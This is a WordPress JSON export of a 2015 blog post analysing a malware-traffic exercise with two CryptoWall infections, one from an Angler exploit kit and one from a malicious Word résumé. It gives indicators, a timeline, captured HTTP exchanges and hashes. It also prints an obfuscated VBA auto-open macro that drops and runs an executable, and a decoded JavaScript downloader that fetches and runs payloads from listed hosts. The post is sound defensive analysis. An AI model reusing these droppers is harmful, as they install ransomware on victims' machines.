{"id":188,"date":"2015-09-29T22:41:01","date_gmt":"2015-09-29T21:41:01","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=188"},"modified":"2016-02-23T21:55:14","modified_gmt":"2016-02-23T21:55:14","slug":"malware-exercise-2015-09-11-a-bridge-too-far-enterprises","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=188","title":{"rendered":"Malware Exercise 2015-09-11 &#8211; A Bridge Too Far Enterprises"},"content":{"rendered":"<p>So I am a little late with this one as I just could not find the mental capacity to finish this one on time due to a head cold that turned into a sinus infection (which I am still fighting). Based on what Brad had said about this one, it was one of his more &#8220;tricky&#8221; exercises and some of the other analysts seem to confirm that as well. With that being said, I seem to get the gist of it pretty quickly. The thing that threw me off was the fact that I did not see the traffic hitting the CryptoWall site at all as I like to scan the PCAP, see what stands out from the filter &#8216;http.request,&#8221; see what the protocol usage is in Wireshark, and then start to look at the traffic from the end and work from there. With that being said, let&#8217;s jump into the analysis&#8230;<\/p>\n<h3>My Results<\/h3>\n<p>&#8211; The infected computer&#8217;s host name.<br \/>\n&gt; FRANKLION-PC<\/p>\n<p>&#8211; The infected computer&#8217;s MAC address.<br \/>\n&gt; 14:fe:b5:ab:ec:7d<\/p>\n<p>&#8211; The infected computer&#8217;s operating system.<br \/>\n&gt; Windows 7 IE 11<\/p>\n<p>&#8211; Indicators of Compromise from these infections.<br \/>\n&gt; prideorganizer.com \/ 104.28.9.93 (Page that had hidden iframe)<br \/>\n&gt; randt.smittysautomart.org \/ 216.245.212.78 (This was the start of the infection chain from the Angler EK)<br \/>\n&gt; ip-addr.es \/ 188.165.164.184 (IP call-back from CryptoWall)<br \/>\n&gt; externalbatterycase.com \/ 192.186.222.229 (post call back from infection from first infection)<br \/>\n&gt; greenevap.com\/ 50.63.95.1 (post call back from infection from second infection)<br \/>\n&gt; employance.com \/ 173.201.1.1 (post call back from infection from second infection)<\/p>\n<p>&#8211; A timeline and chain of events for each of the infections.<br \/>\n&gt; First Cryptowall infection from infected website (prideorganizer.com)<br \/>\n&gt; User hits the site with the hidden iframe &#8211; Fri, Sep 11, 2015 19:49:15 GMT<br \/>\n&gt; Looks like user gets compromised with Flash exploit &#8211; Fri, 11 Sep 2015 19:49:21 GMT<br \/>\n&gt; Binary file dropped onto user&#8217;s system &#8211; Fri, 11 Sep 2015 19:49:28 GMT<br \/>\n&gt; We see a check of the user&#8217;s IP address &#8211; Fri, 11 Sep 2015 19:49:34 GMT<\/p>\n<p>&gt; Second Cryptowall infection from malicious Word document<br \/>\n&gt; User gets email from darylevenzor@yahoo.com at Fri, 11 Sep 2015 14:22:19 -5:00<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/09\/Email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/09\/Email.png\" alt=\"Email\" width=\"629\" height=\"305\" class=\"aligncenter size-full wp-image-198\" \/><\/a><\/p>\n<p>&gt; We see a check of the user&#8217;s IP address &#8211; Fri, 11 Sep 2015 19:55:28 GMT<\/p>\n<h3>Notes about the investigation<\/h3>\n<p>Looks like the start of the infection is from a hidden iframe in the site www.prideorganizer.com as you can see below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/09\/Hidden-iframe.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/09\/Hidden-iframe.png\" alt=\"Hidden iframe\" width=\"1192\" height=\"99\" class=\"aligncenter size-full wp-image-203\" \/><\/a><\/p>\n<p>There seems to be a Flash exploit that is used against the system that is from the iframe mentioned above as seen below:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/except.webarchive?effect=_0KAfLZDy&amp;amp;point=0oySNlI&amp;amp;unite=YXy5&amp;amp;as=6O4nE05A&amp;amp;individual=UuaP&amp;amp;international=&amp;amp;march=8inGVb3g8KcYWAB7 HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Language: en-US\r\nReferer: http:\/\/randt.smittysautomart.org\/boards\/index.php?PHPSESSID=99&amp;amp;action=9x3bc575.2r387u5mjy726\r\nx-flash-version: 18,0,0,203\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\nHost: randt.smittysautomart.org\r\nDNT: 1\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.8.0\r\nDate: Fri, 11 Sep 2015 19:49:21 GMT\r\nContent-Type: application\/x-shockwave-flash\r\nContent-Length: 42952\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n\r\nCWS\r\n}...x.|.I..H. ...D.\\_....^..@.l.@.. ......}..... A...}..:ht.q.$.7..l4ee...2...zF.w.aLG.....2..\r\n<\/pre>\n<p>After the Flash exploit, I see what looks like a binary from what Wireshark tells me (application\/octect-stream) as seen in the traffic below:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/answer.cha?force=PSZ&amp;amp;ever=YdkQAl&amp;amp;growth=9QZ_ungGJ&amp;amp;night=&amp;amp;listen=a8Cx&amp;amp;beyond=&amp;amp;word=dhV684&amp;amp;series=&amp;amp;use=j2PgIqpn8e&amp;amp;quite=&amp;amp;away=5qnyzuAwSW HTTP\/1.1\r\nConnection: Keep-Alive\r\nHost: randt.smittysautomart.org\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.8.0\r\nDate: Fri, 11 Sep 2015 19:49:28 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 216076\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n<\/pre>\n<p>Shortly after what I believe is the binary for the first CryptoWall infection being used on the victim&#8217;s system, I see that there is a call to get the current external IP address of the victim&#8217;s system:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nCT&amp;gt; info 192\r\nInfo of conversation 192:\r\n\r\nSERVER IP : 188.165.164.184:80\r\nTIME : Fri, 09\/11\/15 19:49:32\r\nHOST : ip-addr.es\r\nURI : \/\r\nREFERER :\r\nMETHOD : GET\r\nRESULT NUM : 200 OK\r\nRESULT TYPE : text\/plain\r\nFILE NAME : 191.html\r\nMAGIC : Inconclusive. Probably text (TEXT)\r\nLENGTH : 14 B\r\n\r\nCT&amp;gt; head 192\r\nDisplaying header of object 192 (191.html):\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:34 GMT\r\nContent-Type: text\/plain;charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nLast-Modified: Fri, 11 Sep 2015 19:49:34 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nPragma: no-cache\r\nX-XSS-Protection: 1\r\nServer: DYNAMIC+\r\n\r\nCT&amp;gt; body 192 1000\r\nDisplaying body of object 192 (191.html) &#x5B;14 bytes]:\r\n\r\n204.92.52.214\r\n<\/pre>\n<p>One thing to note here. Based on what I have been reading over the past couple of weeks, it seems that this site (ip-addr.es) is pretty synonymous with a CryptoWall checkin. Granted I am basing this on a lot of the traffic that Brad has been blogging about over on his blog.<\/p>\n<p>Once the IP has been checked, we can then see the post-infection call-backs from the initial CryptoWall infection. Also something to note here is that I am not sure what kind of encoding is being used in the POSTs that the call-backs are making. If anyone has any ideas of how to decode these, please drop me a line in the comments as that would be great to figure out.<\/p>\n<p>Also note where most of the call-backs are going&#8230; Most are going to compromised WordPress installs. Most of the things that I have been reading as of late have pointed NOT to vulnerable code within the core of WordPress, but more to vulnerable plugins that WordPress users use. In this case the call-backs are all pointing to a file called &#8220;ap4.php.&#8221; I tried to find something out about this particular file on Google, but I was not able to find anything about this file.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/wp-admin\/js\/ap4.php?k=sqecun4kcv HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 132\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: externalbatterycase.com\r\nCache-Control: no-cache\r\n\r\nv=725ecfe7d2246574f39c34cff4bf0a94ecc0bdde676c2b9f40c4e4db0c7941b0143388818b72d57452bf2079ebadb398326c20133c8e4aca7c8322bbd7c519c5f7HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:34 GMT\r\nServer: Apache\/2.4.12\r\nX-Powered-By: PHP\/5.4.43\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\ne\r\n725d85b0dc6c68\r\n0\r\n<\/pre>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/wp-admin\/js\/ap4.php?s=8arbpstpadtvsgt HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 94\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: externalbatterycase.com\r\nCache-Control: no-cache\r\n\r\nv=2c7478e56e90138e2c7a156008afea819ef6f5e4d9faf5c3ee75b64c0b59fe416f07aa448209316a97dbb389e5e2HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:37 GMT\r\nServer: Apache\/2.4.12\r\nX-Powered-By: PHP\/5.4.43\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\n3e2\r\n2c7137b460881a922f245c6342ecd0dfd3b5bec4dce1dc...&amp;lt;...&lt;Long string&gt;...&amp;gt;...\r\n0\r\n<\/pre>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nHTTP\/1.0 408 Request Time-out\r\nServer: AkamaiGHost\r\nMime-Version: 1.0\r\nDate: Fri, 11 Sep 2015 19:49:37 GMT\r\nContent-Type: text\/html\r\nContent-Length: 217\r\nExpires: Fri, 11 Sep 2015 19:49:37 GMT\r\n\r\n&amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;\r\n&amp;lt;TITLE&amp;gt;Request Timeout&amp;lt;\/TITLE&amp;gt;\r\n&amp;lt;\/HEAD&amp;gt;&amp;lt;BODY&amp;gt;\r\n&amp;lt;H1&amp;gt;Request Timeout&amp;lt;\/H1&amp;gt;\r\nThe server timed out while waiting for the browser's request.&amp;lt;P&amp;gt;\r\nReference&#032;&#035;2&#046;e60b180&#046;1442000977&#046;0\r\n&amp;lt;\/BODY&amp;gt;&amp;lt;\/HTML&amp;gt;\r\n<\/pre>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/wp-admin\/js\/ap4.php?d=19j14vg1as70d2 HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 160\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: externalbatterycase.com\r\nCache-Control: no-cache\r\n\r\nv=789811319369c1f9...&lt;Long string&gt;...b50d8f3eff3a0HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:40 GMT\r\nServer: Apache\/2.4.12\r\nX-Powered-By: PHP\/5.4.43\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\nb2ea\r\n.PNG\r\n.\r\n...\r\n<\/pre>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/wp-admin\/js\/ap4.php?o=3p4z2b4dviy8iu0 HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 108\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: externalbatterycase.com\r\nCache-Control: no-cache\r\n\r\nz=54ceea7c2bd1aaadb88dc64404b...&lt;Long string&gt;...12e3040HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:54 GMT\r\nServer: Apache\/2.4.12\r\nX-Powered-By: PHP\/5.4.43\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\ne\r\n54c8a02a2599a7\r\n0\r\n<\/pre>\n<p>A little bit later we can then see the second run of CryptoWall from the user looking at the Word document (or in this case the resume) from &#8216;darylevenzor@yahoo.com.&#8217; That document had the malicious binary embedded in it since we see the same call to the site &#8216;ip-addr.es&#8217; shortly after the resume was opened:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: ip-addr.es\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:55:28 GMT\r\nContent-Type: text\/plain;charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nLast-Modified: Fri, 11 Sep 2015 19:55:28 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nPragma: no-cache\r\nX-XSS-Protection: 1\r\nServer: DYNAMIC+\r\n\r\ne\r\n204.92.52.214\r\n\r\n0\r\n<\/pre>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/mtqzpa\/templates\/ap5.php?u=l3fzfhor374a7t HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 130\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: greenevap.com\r\nCache-Control: no-cache\r\n\r\nz=ee2013940495e8a834556e2f5c168d6ee8e8e4b56a820...&lt;Long string&gt;...HTTP\/1.1 503 Service Unavailable\r\nDate: Fri, 11 Sep 2015 19:55:28 GMT\r\nServer: Apache\r\nContent-Length: 362\r\nConnection: close\r\nContent-Type: text\/html; charset=iso-8859-1\r\n\r\n&amp;lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 2.0\/\/EN&quot;&amp;gt;\r\n&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;\r\n&amp;lt;title&amp;gt;503 Service Unavailable&amp;lt;\/title&amp;gt;\r\n&amp;lt;\/head&amp;gt;&amp;lt;body&amp;gt;\r\n&amp;lt;h1&amp;gt;Service Unavailable&amp;lt;\/h1&amp;gt;\r\n&amp;lt;p&amp;gt;The server is temporarily unable to service your\r\nrequest due to maintenance downtime or capacity\r\nproblems. Please try again later.&amp;lt;\/p&amp;gt;\r\n&amp;lt;hr&amp;gt;\r\n&amp;lt;address&amp;gt;Apache Server at greenevap.com Port 80&amp;lt;\/address&amp;gt;\r\n&amp;lt;\/body&amp;gt;&amp;lt;\/html&amp;gt;\r\n<\/pre>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/wp-includes\/theme-compat\/ap2.php?j=l3fzfhor374a7t HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 130\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: employance.com\r\nCache-Control: no-cache\r\n\r\nz=ee2013940495e8a834556e2f5c168d6ee8e8...&lt;Long string&gt;...145465HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:55:29 GMT\r\nServer: Apache\r\nVary: Accept-Encoding\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\ne\r\nee2057c70adde5\r\n0\r\n<\/pre>\n<p>Using OfficeMalScanner I was able to get some more information about how the Word document works since I was able to get the script that runs when the user launches the file as you can see below (and also how the author(s) feel about AV):<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nAttribute VB_Name = &quot;ThisDocument&quot;\r\nAttribute VB_Base = &quot;1Normal.ThisDocument&quot;\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nSub Auto_Open()\r\n     zGCwkKBGTOs\r\nEnd Sub\r\n\r\nSub zGCwkKBGTOs()\r\n     Dim ezbVRLGmmo As String\r\n     Dim iqvhxHmFSdrrP As String\r\n     Dim iYwihdJA As Integer\r\n     Dim bvNUjgU As String\r\n     Dim VBJeJNNj As Byte\r\n     Dim dRZAVyCRqn As Paragraph\r\n     Dim XhnzHZgleilRL As Long\r\n     Dim CAMGDebZMD As Integer\r\n     Dim splRmDLtFg As String\r\n     Dim eOqQRgYctMzmuZ As String\r\n     Dim dsuvHC As String\r\n     Dim MniQXWEhfv As Boolean\r\n     Dim QbhrXGT As Integer\r\n     bvNUjgU = &quot;zqnuhsi&amp;H46&amp;H55&amp;H43&amp;H4B2&amp;H047&amp;H44&amp;H41&amp;H54&amp;H41&amp;H21&quot;\r\n     splRmDLtFg = &quot;exe&quot;\r\n     eOqQRgYctMzmuZ = &quot;iaEhcYUCk&quot; + &quot;o&quot;\r\n     HHRSydvjwaq = &quot;.&quot;\r\n     ezbVRLGmmo = eOqQRgYctMzmuZ + HHRSydvjwaq + splRmDLtFg\r\n     YqPyWrU\r\n     iYwihdJA = FreeFile()\r\n\r\n     AGRVOkemteQ\r\n\r\n     Debug.Print (&quot;After OnTime: &quot; &amp; Now)\r\n\r\n     Dim opobUCTy As String\r\n     Dim LyunJq As String\r\n     Dim cBFXXhV As String\r\n     Dim dtxmeZtrxOLted As String\r\n     Dim XtibNFnRE As Document\r\n     Set dEqXIBDNuKqF = CreateObject(&quot;Sc&quot; + &quot;riptContro&quot; + &quot;l&quot;)\r\n     dEqXIBDNuKqF.Language = &quot;VBS&quot; + &quot;cri&quot; + &quot;p&quot; + &quot;t&quot;\r\n     opobUCTy = &quot;ActiveDocumen&quot; + &quot;t&quot; + &quot;.&quot;\r\n     cBFXXhV = &quot;Paragraph&quot; + &quot;s&quot;\r\n     LyunJq = opobUCTy + cBFXXhV\r\n     Set VeZpOpVh = GetObject(, &quot;word&quot; + &quot;.Applic&quot; + &quot;atio&quot; + &quot;n&quot;)\r\n     On Error GoTo JFhYAolPD\r\n     dEqXIBDNuKqF.AddObject &quot;Obj&quot;, VeZpOpVh\r\n\r\n     Dim FwKeQXNgqxMxvnL As Boolean\r\n     FwKeQXNgqxMxvnL = False\r\n     Dim DhvFHjK As Boolean\r\n     DhvFHjK = True\r\n\r\nJFhYAolPD:\r\n     For Each dRZAVyCRqn In dEqXIBDNuKqF.Eval(&quot;Obj.&quot; &amp; LyunJq)\r\n          hPuJZIlGpcz (dRZAVyCRqn)\r\n          iqvhxHmFSdrrP = dRZAVyCRqn.Range.Text\r\n          Debug.Print (&quot;After OnTime: &quot; &amp; Now)\r\n          If (MniQXWEhfv = True) Then\r\n               XhnzHZgleilRL = (37 - 36)\r\n          Dim VCAMcIBwsA As Integer\r\n          VCAMcIBwsA = (68 - 64)\r\n               While (XhnzHZgleilRL &lt; Len(iqvhxHmFSdrrP))\r\n                    VBJeJNNj = Mid(iqvhxHmFSdrrP, XhnzHZgleilRL, VCAMcIBwsA)\r\n                    Debug.Print (&quot;After OnTime: &quot; &amp; Now)\r\n                    Put #iYwihdJA, , VBJeJNNj\r\n                    XhnzHZgleilRL = XhnzHZgleilRL + (7 - 3)\r\n               Wend\r\n          ElseIf (InStr((88 - 87), iqvhxHmFSdrrP, bvNUjgU) &gt; (64 - 64) And Len(iqvhxHmFSdrrP) &gt; (27 - 27)) Then\r\n               MniQXWEhfv = DhvFHjK\r\n          End If\r\n          Next\r\n     Debug.Print (&quot;After OnTime: &quot; &amp; Now)\r\n     If (FwKeQXNgqxMxvnL = True) Then\r\n          MsgBox (&quot;FUCK AV&quot;)\r\n     Else\r\n          Close #iYwihdJA\r\n     End If\r\n     HYUzMcPhknOwSHA (ezbVRLGmmo)\r\nEnd Sub\r\n\r\nSub AutoOpen()\r\n     Auto_Open\r\nEnd Sub\r\n\r\nSub HYUzMcPhknOwSHA(ezbVRLGmmo As String)\r\n     Dim dsuvHC As String\r\n     Dim dphUNjFKvsin As Object\r\n     Dim QbhrXGT As Integer\r\n     dsuvHC = Environ(&quot;USERPROFIL&quot; + &quot;E&quot;)\r\n     ChDrive (dsuvHC)\r\n     ChDir (dsuvHC)\r\n\r\n     Debug.Print (&quot;After OnTime: &quot; &amp; Now)\r\n\r\n     Set dphUNjFKvsin = VBA.CreateObject(&quot;WSc&quot; + &quot;ript&quot; + &quot;.She&quot; + &quot;l&quot; + &quot;l&quot;)\r\n     On Error Resume Next\r\n     dphUNjFKvsin.Run (ezbVRLGmmo)\r\n     TdkFfShCkIHO\r\nEnd Sub\r\n\r\nSub hPuJZIlGpcz(fVXCWogxUYsIi)\r\n     DoEvents\r\nEnd Sub\r\n\r\nSub AGRVOkemteQ()\r\n     Dim splRmDLtFg As String\r\n     Dim ezbVRLGmmo As String\r\n     Dim eOqQRgYctMzmuZ As String\r\n     Dim iYwihdJA As Integer\r\n     Dim HHRSydvjwaq As String\r\n     eOqQRgYctMzmuZ = &quot;iaEhcYUCko&quot;\r\n     HHRSydvjwaq = &quot;.&quot;\r\n     splRmDLtFg = &quot;exe&quot;\r\n     ezbVRLGmmo = eOqQRgYctMzmuZ + HHRSydvjwaq + splRmDLtFg\r\n     iYwihdJA = FreeFile()\r\n     Open ezbVRLGmmo For Binary As iYwihdJA\r\nEnd Sub\r\n\r\nSub TdkFfShCkIHO()\r\n     Word.ActiveDocument.Range.Select\r\n     Selection.WholeStory\r\n     Selection.Delete Unit:=wdCharacter, Count:=(53 - 52)\r\n     Dim hnyvtVpsnYB As Word.Document\r\n     Set hnyvtVpsnYB = ThisDocument\r\n     hnyvtVpsnYB.Range.InsertParagraphAfter\r\n     hnyvtVpsnYB.Range.InsertAfter &quot;&quot; + vbLf\r\nEnd Sub\r\n\r\nSub YqPyWrU()\r\n     dsuvHC = Environ(&quot;USERPRO&quot; + &quot;FIL&quot; + &quot;E&quot;)\r\n     ChDrive (dsuvHC)\r\n     ChDir (dsuvHC)\r\nEnd Sub\r\n\r\nSub Workbook_Open()\r\n     Auto_Open\r\nEnd Sub\r\n<\/pre>\n<p>Information about malicious files from the investgation:<br \/>\n===================================<\/p>\n<p>Name: except.webarchive.swf<br \/>\nMD5: b1938532d94bb3cb618a09d754f8e87a<br \/>\nDetection ratio from VT: 8 \/ 56<br \/>\nVT link: http:\/\/www.virustotal.com\/en\/file\/90665db61bc3b7ff37927367ad6c7a41a94d4b38ac3067527b9ea1e335667a91\/analysis\/<\/p>\n<p>*Name: js-1.exe<br \/>\nMD5: d48ef4bb0549a67083017169169ef3ee<br \/>\nDetection ratio from VT: 5 \/ 56<br \/>\nVT link: http:\/\/www.virustotal.com\/en\/file\/daf4d96a121c9e4935082d4e0264088ff352f14d868f8720d8fa7e4f99c82f05\/analysis\/<\/p>\n<p>*Name: js-3.exe<br \/>\nMD5: 9c23ea676cd623e4527db2336ebff335<br \/>\nDetection ratio from VT: 31 \/ 57<br \/>\nVT link: http:\/\/www.virustotal.com\/en\/file\/33c80532e3cbabe39fba8318d91f14dd956f20033725878c4832a2fc063dafb2\/analysis\/<\/p>\n<p>*The files js-1 and js-3 (js-2 got deleted by accident) were caught by running the javascript code in a browser. The interesting thing about this one is that I was also able to decode it via Malzilla. The output of that decode can be found below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nfunction dl(fr) { var b = &quot;ihaveavoice2.com laterrazzafiorita.it idsecurednow.com&quot;.split(&quot; &quot;); \r\nfor (var i=0; i&lt;b.length; i++) { var ws = new ActiveXObject(&quot;WScript.Shell&quot;); \r\nvar fn = ws.ExpandEnvironmentStrings(&quot;%TEMP%&quot;)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+&quot;.exe&quot;; \r\nvar dn = 0; var xo = new ActiveXObject(&quot;MSXML2.XMLHTTP&quot;); \r\nxo.onreadystatechange = function() { if (xo.readyState == 4 &amp;&amp; xo.status == 200) { var xa = new ActiveXObject(&quot;ADODB.Stream&quot;); \r\nxa.open(); xa.type = 1; xa.write(xo.ResponseBody); \r\nif (xa.size &gt; 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); \r\ntry { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; \r\ntry { xo.open(&quot;GET&quot;,&quot;http:\/\/&quot;+b&#x5B;i]+&quot;\/document.php?rnd=&quot;+fr+&quot;&amp;id=&quot;+str, false); \r\nxo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(2461); dl(6862); dl(1503);\r\n<\/pre>\n<p>One day I will have to see what I can come up with with regards to trying to reverse engineer these executables. Until then they lay here and wait.<\/p>\n<p>**Name: vbaProject.bin<br \/>\nMD5: 646bc5e99b9354c9ad787ccf733a4b38<br \/>\nDetection ratio from VT: 7 \/ 57<br \/>\nVT link: http:\/\/www.virustotal.com\/en\/file\/7798181485f06ce8f34a2d2f7d01137309b19ca80924ee1e0fc185734aa4a188\/analysis\/1444160706\/<\/p>\n<p>**The bin file was extracted from the malicious word document (the resume) which I believe has the embedded binary of CryptoWall since there are no calls to any web resources in the script.<\/p>\n<p>So that is it for this one. As usual, if you want the things that I found please hit up my GitHub page for the artifacts. On to the next one investigation.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So I am a little late with this one as I just could not find the mental capacity to finish this one on time due to a head cold that turned into a sinus infection (which I am still fighting). Based on what Brad had said about this one, it was one of his more &#8220;tricky&#8221; exercises and some of the other analysts seem to confirm that as well. With that being said, I seem to get the gist of it pretty quickly. The thing that threw me off was the fact that I did not see the traffic hitting&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=188\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-188","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=188"}],"version-history":[{"count":12,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/188\/revisions"}],"predecessor-version":[{"id":204,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/188\/revisions\/204"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}